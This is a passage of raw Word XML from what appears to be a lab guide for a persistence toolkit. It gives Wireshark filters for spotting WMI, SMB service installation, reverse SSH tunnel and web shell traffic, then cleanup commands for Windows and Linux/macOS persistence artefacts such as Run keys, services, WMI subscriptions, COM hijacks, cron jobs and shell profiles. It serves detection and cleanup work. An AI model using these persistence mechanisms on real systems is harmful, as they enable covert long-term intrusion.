          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark Filters for Lab Observation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># WMI activity (DCOM traffic)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp.port == 135 or tcp.port == 49152</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Service installation traffic (SMB)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">smb2 and smb2.cmd == 0x0005</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Reverse SSH tunnel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp.port == 443 and ssh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Web shell request pattern</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">http.request.method == "POST" and http.request.uri contains ".php"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1565C0" w:sz="6" w:space="6"/>
        </w:pBdr>
        <w:spacing w:before="520" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B2A"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">6.  Cleanup Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Cleanup Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Registry Run key</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v PersistenceToolkit /f</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Scheduled task</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">schtasks /Delete /TN SysNetCompatTask /F</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Windows service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">sc stop SysNetCompat &amp;&amp; sc delete SysNetCompat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># WMI subscriptions (PowerShell)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-WMIObject -Namespace root\subscription -Class __EventFilter | Remove-WMIObject</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-WMIObject -Namespace root\subscription -Class CommandLineEventConsumer | Remove-WMIObject</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding | Remove-WMIObject</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Startup folder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">del "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\persistence_toolkit.bat"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Winlogon restore</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe," /f</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Local account</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">net user svc_netcompat /delete</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># COM hijack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">reg delete "HKCU\Software\Classes\CLSID\{BCDE0395-E52F-467C-8E3D-C4579291692E}" /f</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux/macOS Cleanup Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Systemd service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl disable --now sysnetcompat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">rm -f /etc/systemd/system/sysnetcompat.service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl daemon-reload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Cron job</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">rm -f /etc/cron.d/sysnetwork</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">crontab -l | grep -v sysnetd | crontab -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Shell profile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">sed -i '/sysnetd/d' ~/.bashrc ~/.zshrc ~/.bash_profile ~/.profile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
